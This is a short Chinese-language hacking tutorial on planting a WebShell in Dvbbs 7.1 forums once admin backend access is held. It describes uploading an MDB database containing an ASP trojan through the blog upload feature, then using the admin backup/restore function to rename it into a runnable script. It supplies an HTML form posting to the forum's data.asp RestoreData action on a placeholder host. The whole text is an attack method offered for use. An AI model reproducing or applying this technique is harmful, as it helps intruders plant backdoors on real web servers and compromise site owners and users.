主要说的是有后台权限的情况下取得WebShell的方法。
Access:
通过博客(boke)上传程序上传插入了ASP木马的MDB数据库后通过后台备份改名。
Sql:
通过博客(boke)上传程序上传插入了ASP木马的MDB数据库后通过提交程序备份数据库。
以下是代码:
<form action="http://www.xxx.com/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>
更多详细情况请参考ANGEL的《动网论坛7.0获得WebShell的分析》。
注:为什么不通过个人头像和发表帖子上传文件呢?因为那些方式在大部分Dvbbs7.1中都已经无法上传ASP的假图片了,而且即使能上传也无法通过后台的备份来改木马名。
